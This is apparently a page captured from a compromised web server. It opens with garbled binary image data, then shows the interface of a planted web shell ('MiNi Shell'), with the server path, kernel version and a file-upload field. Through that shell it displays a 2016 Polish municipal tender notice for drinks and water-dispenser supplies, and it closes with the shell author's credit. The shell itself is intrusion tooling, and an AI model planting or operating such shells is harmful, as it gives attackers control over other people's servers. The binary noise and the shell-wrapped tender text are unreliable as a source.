JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160422/100818-N-2016.html

<p class="kh_header"><b>Mikołów: Część 1- Zakup i sukcesywna dostawa wody mineralnej i soków owocowych, herbaty, cukru, syropu do napojów 
Część 2- Zakup i sukcesywna dostawa wody źródlanej do dystrybutorów, dzierżawa i sanityzacja dystrybutorów, dostawa kubków jednorazowych do dystrybutorów</b><br>
<b>Numer ogłoszenia: 100818 - 2016; data zamieszczenia: 22.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 2, 43-190 Mikołów, woj. śląskie, tel. 32 3242666, faks 32 3242694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.mikolow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część 1- Zakup i sukcesywna dostawa wody mineralnej i soków owocowych, herbaty, cukru, syropu do napojów 
Część 2- Zakup i sukcesywna dostawa wody źródlanej do dystrybutorów, dzierżawa i sanityzacja dystrybutorów, dostawa kubków jednorazowych do dystrybutorów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1- Zakup i sukcesywna dostawa wody mineralnej i soków owocowych, herbaty, cukru, syropu do napojów w tym na potrzeby projektu Krok w przyszłość w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020, Oś Priorytetowa IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - projekt pozakonkursowy

WODA MINERALNA
Woda winna być w fabrycznie zamkniętych butelkach typu PET(plastikowe, jednorazowe) o pojemności 0,5L oraz 1,5L, bez zanieczyszczeń o neutralnym smaku i zapachu, bez fizycznych uszkodzeń dyskwalifikujących produkt (np. widoczne ubytki, uszkodzone opakowanie). 

termin przydatności do spożycia w chwili dostawy do Zamawiającego nie może być krótszy niż 6 miesięcy.

Oferowany produkt musi spełniać wymagania Rozporządzenia Ministra Zdrowia z dnia 31 marca 2011 roku w sprawie naturalnych wód mineralnych, wód źródlanych i wód stołowych.

Na etykiecie na butelce winne znajdować się informacje dot.
Nazwa producenta dostawcy wraz z adresem
Nazwa produktu
Nazwa źródła z którego woda pochodzi z zawartością składników mineralnych
Informacja, że woda posiada aktualne atesty higieniczne lub dopuszczenia wydane przed uprawnione do kontroli jakości wody mineralnej
Data przydatności do spożycia

Woda mineralna niegazowana: średniozmineralizowana, zgodnie z kryteriami klasyfikacji chemicznej stosowanej w znakowaniu naturalnych wód mineralnych, ogólna zawartość składników mineralnych nie więcej niż 700mgL, przy czym zawartość sodu nie może przekraczać 76 mgL

Przewidywana ilość: 1380 sztuk - 1,5Litra
1128 sztuk - 0,5 Litra

Woda mineralna gazowana, średniozmineralizowana,  zgodnie z kryteriami klasyfikacji chemicznej stosowanej w znakowaniu naturalnych wód mineralnych, ogólna zawartość składników mineralnych nie więcej niż 700mgL, przy czym zawartość sodu nie może przekraczać 76 mgL

Przewidywana ilość: 580 sztuk - 1,5 Litra
612 sztuk - 0,5 Litra

SOKI OWOCOWE 
100% sok, bez dodatku cukru i substancji słodzących, pasteryzowany, wzbogacony witaminą C, w kartonikach 0,2 L ze słomką plastikową., dwa smaki- jabłkowy i pomarańczowy. 

Termin przydatności do spożycia w chwili dostawy do Zamawiającego nie może być krótszy niż 6 miesięcy.

Oferowany produkt musi spełniać wymagania Rozporządzenia Ministra Zdrowia dot. środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży (Dz. U.2015 poz.1256)

Przewidywana ilość  - 200 sztuk (1 smak razy 100 sztuk)
	
HERBATA, KAWA, CUKIER, SYROP
Herbata czarna ekspresowa, w torebkach, min 100 sztuk w opakowaniu, przewidywana ilość - 12 opakowań
Kawa rozpuszczalna liofilizowana - słoik min 200g, 100% naturalna kawa arabica, przewidywana ilość- 4 słoiki. 

Cukier biały, drobnomielony, 1kgopakowanie, przewidywana ilość 70 kg

Cukier biały drobnomielony w saszetkach - saszetka min 5 g w opakowaniu 200 saszetek; przewidywana ilość- 1 opakowanie 

Syrop owocowy w szklanych butelkach, do przyrządzania napojów, smak malinowy lub truskawkowy, bez sztucznych konserwantów i barwników, o naturalnym i owocowym zapachu i smaku, minimum 62% ogólnego ekstraktu, wzbogacony witaminami - minimum wit. C, pasteryzowany. Przewidywana ilość 70 butelek o pojemności minimum 400 ml 

Termin przydatności do spożycia w chwili dostawy do Zamawiającego nie może być krótszy niż 6 miesięcy.



Część 2- Zakup i sukcesywna dostawa wody źródlanej do dystrybutorów, dzierżawa i sanityzacja dystrybutorów, dostawa kubków jednorazowych do dystrybutorów


Wykonawca na swój koszt zobowiązuje się do dostawy i zainstalowania 5 sztuk fabrycznie nowych urządzeń do dozowania naturalnej wody źródlanej (dozowanie ciepłej i zimnej wody). Urządzenia dozujące wodę mają być umieszczone na podłodze, wymiary: Wysokość min 95-100cm (+- 5cm); Szerokość, głębokość min 28x min 28 cm (+- 5 cm)
Woda podgrzewana do - minimum 90 stopni Cejslujsza
Woda schładzana  - do 10 stopni Celsjusza
Wykonawca zapewnia bezpłatny serwis w w urządzeń przez cały okres trwania umowy, usuwać wszelkie awarie wynikające z normalnego użytkowania urządzeń w ciągu 24 godzin od zgłoszenia ich drogą elektroniczną.
Wykonawca jest zobowiązany do sanityzacji zainstalowanych urządzeń w okresie obowiązywania umowy. Termin sanityzacji będzie uzgadniany każdorazowo z Zamawiającym.
Wykonawca na swój koszt zobowiązuje się do dostarczania wody do dystrybutorów, o których mowa powyżej, przewidywana ilość butli- 130 szt..
Termin przydatności wody do spożycia minimum 60 dni od daty dostawy.
Woda winna posiadać certyfikat jakości PZH. Woda musi spełniać wymagania Rozporządzenia Ministra Zdrowia z dnia 31 marca 2011 roku w sprawie naturalnych wód mineralnych, wód źródlanych i wód stołowych. 
Butle winny posiadać atest PZH dopuszczający do stosowania  ich w obrocie, w celach spożywczych. Butle mają być dostosowane do dzierżawionych urządzeń dozujących wodę. Korki butli winny być zabezpieczone zewnętrzną folią. Pojemność 19L (+- 0,1 L)
Do obowiązków Wykonawcy należy dostawa kubków jednorazowych o pojemności 200 ml na zimną (przewidywana ilość kubków- 5000 szt ) i gorącą wodę (przewidywana ilość kubków- 1000 szt).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji dostawy cząstkowej - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.mikolow.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.05.2016 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Krok w przyszłość w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020, Oś Priorytetowa IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - projekt pozakonkursowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i sukcesywna dostawa wody mineralnej i soków owocowych, herbaty, cukru, syropu do napojów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i sukcesywna dostawa wody mineralnej i soków owocowych, herbaty, cukru, syropu do napojów w tym na potrzeby projektu Krok w przyszłość w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020, Oś Priorytetowa IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - projekt pozakonkursowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 15.98.12.00-0, 15.86.00.00-4, 15.83.10.00-2.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i sukcesywna dostawa wody źródlanej do dystrybutorów, dzierżawa i sanityzacja dystrybutorów, dostawa kubków jednorazowych do dystrybutorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i sukcesywna dostawa wody źródlanej do dystrybutorów, dzierżawa i sanityzacja dystrybutorów, dostawa kubków jednorazowych do dystrybutorów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com